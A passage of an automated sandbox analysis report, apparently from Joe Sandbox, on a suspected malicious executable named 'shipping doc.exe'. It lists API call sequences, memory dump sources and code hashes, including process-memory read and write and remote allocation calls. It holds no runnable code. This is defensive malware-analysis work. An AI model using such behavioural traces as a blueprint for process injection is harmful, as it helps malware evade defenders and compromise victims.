                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3897988419-0
                                                                                              • Opcode ID: 2a8dd84acbd3f2463b0280d05754d2fbda305005e60f61f2cf58fc261e13967c
                                                                                              • Instruction ID: 9cf5c7151632995a85d5fbc5732a20f846e81b898dc132985ca9b0023211efdc
                                                                                              • Opcode Fuzzy Hash: 2a8dd84acbd3f2463b0280d05754d2fbda305005e60f61f2cf58fc261e13967c
                                                                                              • Instruction Fuzzy Hash: A4016276600214BFDB224F6ADC44BAA7AFDEF48791F144128FE09D7220D775DE809BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0014E997
                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 0014E9A5
                                                                                              • Sleep.KERNEL32(00000000), ref: 0014E9AD
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0014E9B7
                                                                                              • Sleep.KERNEL32 ref: 0014E9F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                              • String ID:
                                                                                              • API String ID: 2833360925-0
                                                                                              • Opcode ID: 7de09f1a7cac8d17f66daaa9c72a19e1764c729641574919951ff312221a307f
                                                                                              • Instruction ID: 3a7ecfa11c0f28e5dd9ee3fe9ae0c7bc704ab9e2b41d720797cb007a03e7ab3e
                                                                                              • Opcode Fuzzy Hash: 7de09f1a7cac8d17f66daaa9c72a19e1764c729641574919951ff312221a307f
                                                                                              • Instruction Fuzzy Hash: 9D014C31C0162DDBCF04AFE5DC69AEDBBB8FF09715F41055AE502B22A1DB309594CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00141114
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,00140B9B,?,?,?), ref: 00141120
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00140B9B,?,?,?), ref: 0014112F
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00140B9B,?,?,?), ref: 00141136
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014114D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 842720411-0
                                                                                              • Opcode ID: 3129621cb2eb7ebe50de28951e689989c7071d476bc7ca10e915bcbe4b66650b
                                                                                              • Instruction ID: 049d5e8321588a92647b2b1c50a0a5203a26251c4163f1da310bb4be79900589
                                                                                              • Opcode Fuzzy Hash: 3129621cb2eb7ebe50de28951e689989c7071d476bc7ca10e915bcbe4b66650b
                                                                                              • Instruction Fuzzy Hash: 01013779200205BFDB154FA5DC49E6A3F7EEF897A1B244429FA49D7360DB31DCC09AA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00140FCA
                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00140FD6
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00140FE5
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00140FEC
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00141002
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: cfddcdbcd8867d1f37b73cf6b85f9872c79b7c7150afdd25b1aa2687e7598878
                                                                                              • Instruction ID: 72bc33360a50d9d9021a29bf4d1a4c05d16ce3941961339709bffe02f812e0a1
                                                                                              • Opcode Fuzzy Hash: cfddcdbcd8867d1f37b73cf6b85f9872c79b7c7150afdd25b1aa2687e7598878
                                                                                              • Instruction Fuzzy Hash: 33F04979200301FBDB214FA4AC49F563FBDEF89762F604428FA49D7261CA70DCC08AA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0014102A
                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00141036
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00141045
                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0014104C
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00141062
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: 32b00c7f5d752a7f2b051905be879f2c2d778ae57af938db1745917d4676f67d
                                                                                              • Instruction ID: abd62440fb54c2f7525623d932d5b0627fd959ad7b7fca4ba1175421e1a6382f
                                                                                              • Opcode Fuzzy Hash: 32b00c7f5d752a7f2b051905be879f2c2d778ae57af938db1745917d4676f67d
                                                                                              • Instruction Fuzzy Hash: 24F04939200301FBDB215FA4EC49F563BBDEF89761F200828FA4DD7260CA70D8D08AA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,0015017D,?,001532FC,?,00000001,00122592,?), ref: 00150324
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,0015017D,?,001532FC,?,00000001,00122592,?), ref: 00150331
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,0015017D,?,001532FC,?,00000001,00122592,?), ref: 0015033E
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,0015017D,?,001532FC,?,00000001,00122592,?), ref: 0015034B
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,0015017D,?,001532FC,?,00000001,00122592,?), ref: 00150358
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,0015017D,?,001532FC,?,00000001,00122592,?), ref: 00150365
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 674d665eeab2ea16d94dfe7bc7f84efa26fcd642d25abfec173df3cc498fb2fb
                                                                                              • Instruction ID: 691d17700bb41d8312b76fce37f0d69737d337facc65175983cdc06452c77d61
                                                                                              • Opcode Fuzzy Hash: 674d665eeab2ea16d94dfe7bc7f84efa26fcd642d25abfec173df3cc498fb2fb
                                                                                              • Instruction Fuzzy Hash: A101A272800B15DFC7319FA6D880412F7F5BF543163158A3FD1A652931C371A998CF80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0011D752
                                                                                                • Part of subcall function 001129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000), ref: 001129DE
                                                                                                • Part of subcall function 001129C8: GetLastError.KERNEL32(00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000,00000000), ref: 001129F0
                                                                                              • _free.LIBCMT ref: 0011D764
                                                                                              • _free.LIBCMT ref: 0011D776
                                                                                              • _free.LIBCMT ref: 0011D788
                                                                                              • _free.LIBCMT ref: 0011D79A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 001da1c31f129ab9e92b2cdeaa82faf45c7bcc4e15a50ac2b3ed53f265831376
                                                                                              • Instruction ID: 13799edca9b0e54c7bc2881df8d1387d7e1d85971183b8d0f403e20b291c0a2a
                                                                                              • Opcode Fuzzy Hash: 001da1c31f129ab9e92b2cdeaa82faf45c7bcc4e15a50ac2b3ed53f265831376
                                                                                              • Instruction Fuzzy Hash: E3F09632500218ABC629FB68F9C6C9777DDBB05728B940C25F048DB941CB34FCD086E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00145C58
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00145C6F
                                                                                              • MessageBeep.USER32(00000000), ref: 00145C87
                                                                                              • KillTimer.USER32(?,0000040A), ref: 00145CA3
                                                                                              • EndDialog.USER32(?,00000001), ref: 00145CBD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3741023627-0
                                                                                              • Opcode ID: 144a5009956f2be2d43be7345c1661c2c89bcc43f3725151b91abb8f59adb189
                                                                                              • Instruction ID: 6666824cd00f67a142ef1f5653cb2bd821d22fa3e0569906d05d6dba1dcc0d71
                                                                                              • Opcode Fuzzy Hash: 144a5009956f2be2d43be7345c1661c2c89bcc43f3725151b91abb8f59adb189
                                                                                              • Instruction Fuzzy Hash: 18016D30500B04ABEB255B10ED8EFA67BBDBB00B06F00055DB587A15E2DBF0A9C48BD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 001122BE
                                                                                                • Part of subcall function 001129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000), ref: 001129DE
                                                                                                • Part of subcall function 001129C8: GetLastError.KERNEL32(00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000,00000000), ref: 001129F0
                                                                                              • _free.LIBCMT ref: 001122D0
                                                                                              • _free.LIBCMT ref: 001122E3
                                                                                              • _free.LIBCMT ref: 001122F4
                                                                                              • _free.LIBCMT ref: 00112305
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: ee10dedb5bbc38608769af7a3d7c1fc3e97bd7d3e7c936c662f49d3d2a0e3470
                                                                                              • Instruction ID: 21b4fb8285657f43c6e44a0ffdd2925c1058f11ad269f07172d47e3779624410
                                                                                              • Opcode Fuzzy Hash: ee10dedb5bbc38608769af7a3d7c1fc3e97bd7d3e7c936c662f49d3d2a0e3470
                                                                                              • Instruction Fuzzy Hash: 72F05EB59001249B861BBF58BC018AD3B64F729B60751076AF410DBBB1C73448F1AFE4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • EndPath.GDI32(?), ref: 000F95D4
                                                                                              • StrokeAndFillPath.GDI32(?,?,001371F7,00000000,?,?,?), ref: 000F95F0
                                                                                              • SelectObject.GDI32(?,00000000), ref: 000F9603
                                                                                              • DeleteObject.GDI32 ref: 000F9616
                                                                                              • StrokePath.GDI32(?), ref: 000F9631
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                              • String ID:
                                                                                              • API String ID: 2625713937-0
                                                                                              • Opcode ID: 23ad8779f1dabd3e30f459ceabeba5ad67f9fa6f16408308b627de59ba33d8c7
                                                                                              • Instruction ID: 5456c016605972763e5432d089d1ff91ccde5dde5e5b2f1b4c88f0b2f5937b18
                                                                                              • Opcode Fuzzy Hash: 23ad8779f1dabd3e30f459ceabeba5ad67f9fa6f16408308b627de59ba33d8c7
                                                                                              • Instruction Fuzzy Hash: FAF03C34005748EBDB225F65ED2C7B83BB5AB0032AF548318F529958F0C73089D1EFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$_free
                                                                                              • String ID: a/p$am/pm
                                                                                              • API String ID: 3432400110-3206640213
                                                                                              • Opcode ID: fda1d78468693c0e8e47e0e09ed4764c52adcb5a21560b71789e193ec2b5e70b
                                                                                              • Instruction ID: 302916a100aa0642fa6d737f39c036d92f7682855bd4fb929040951083cecc8c
                                                                                              • Opcode Fuzzy Hash: fda1d78468693c0e8e47e0e09ed4764c52adcb5a21560b71789e193ec2b5e70b
                                                                                              • Instruction Fuzzy Hash: DCD1CE31924206BACB2C9F68C845AFAF7B1FF15310F290179EB219B654E3759DC0CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00100242: EnterCriticalSection.KERNEL32(001B070C,001B1884,?,?,000F198B,001B2518,?,?,?,000E12F9,00000000), ref: 0010024D
                                                                                                • Part of subcall function 00100242: LeaveCriticalSection.KERNEL32(001B070C,?,000F198B,001B2518,?,?,?,000E12F9,00000000), ref: 0010028A
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                                • Part of subcall function 001000A3: __onexit.LIBCMT ref: 001000A9
                                                                                              • __Init_thread_footer.LIBCMT ref: 00167BFB
                                                                                                • Part of subcall function 001001F8: EnterCriticalSection.KERNEL32(001B070C,?,?,000F8747,001B2514), ref: 00100202
                                                                                                • Part of subcall function 001001F8: LeaveCriticalSection.KERNEL32(001B070C,?,000F8747,001B2514), ref: 00100235
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                              • String ID: 5$G$Variable must be of type 'Object'.
                                                                                              • API String ID: 535116098-3733170431
                                                                                              • Opcode ID: 49d84017f3b5c701bbb0e6b3630da470108d10636be35423704bd008400bfd54
                                                                                              • Instruction ID: 68142d5b474bff11c911134194ef257ca1e40a5843edc77efc56131b4fdd8460
                                                                                              • Opcode Fuzzy Hash: 49d84017f3b5c701bbb0e6b3630da470108d10636be35423704bd008400bfd54
                                                                                              • Instruction Fuzzy Hash: 96918A70A04209EFCB14EF98D9919FDB7B2FF49308F108459F806AB292DB71AE55CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0014B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001421D0,?,?,00000034,00000800,?,00000034), ref: 0014B42D
                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00142760
                                                                                                • Part of subcall function 0014B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001421FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0014B3F8
                                                                                                • Part of subcall function 0014B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0014B355
                                                                                                • Part of subcall function 0014B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00142194,00000034,?,?,00001004,00000000,00000000), ref: 0014B365
                                                                                                • Part of subcall function 0014B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00142194,00000034,?,?,00001004,00000000,00000000), ref: 0014B37B
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001427CD
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0014281A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                              • String ID: @
                                                                                              • API String ID: 4150878124-2766056989
                                                                                              • Opcode ID: 9c4e2515b060b273661bba5df7a94d5228d3d60de65ebe43e418d19cdb05c7cb
                                                                                              • Instruction ID: 0eddbdab8ab03c6f7e905b46c6c6aac8f1553a435e78164b463ff8e6a9d6ab9f
                                                                                              • Opcode Fuzzy Hash: 9c4e2515b060b273661bba5df7a94d5228d3d60de65ebe43e418d19cdb05c7cb
                                                                                              • Instruction Fuzzy Hash: 2B412F72900218AFDB10DFA4CD85EDEBBB8EF15700F104099FA55B7191DB70AE85CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\shipping doc.exe,00000104), ref: 00111769
                                                                                              • _free.LIBCMT ref: 00111834
                                                                                              • _free.LIBCMT ref: 0011183E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\Desktop\shipping doc.exe
                                                                                              • API String ID: 2506810119-831869447
                                                                                              • Opcode ID: 6798baf5e3e0bea07a7af501f6ad2201ed03597c3a8252f0dddf8a5d08b4d69d
                                                                                              • Instruction ID: 5e6b22feab55c3cd31a6ca8d60f49518d64f6b5ef0cc5edd61ad47c1ea814baf
                                                                                              • Opcode Fuzzy Hash: 6798baf5e3e0bea07a7af501f6ad2201ed03597c3a8252f0dddf8a5d08b4d69d
                                                                                              • Instruction Fuzzy Hash: 90319C71A04218BBCB29DF999881DDEFBFCEB95310B6141BAEA0497251D7708AC0CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0014C306
                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 0014C34C
                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001B1990,018657B0), ref: 0014C395
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
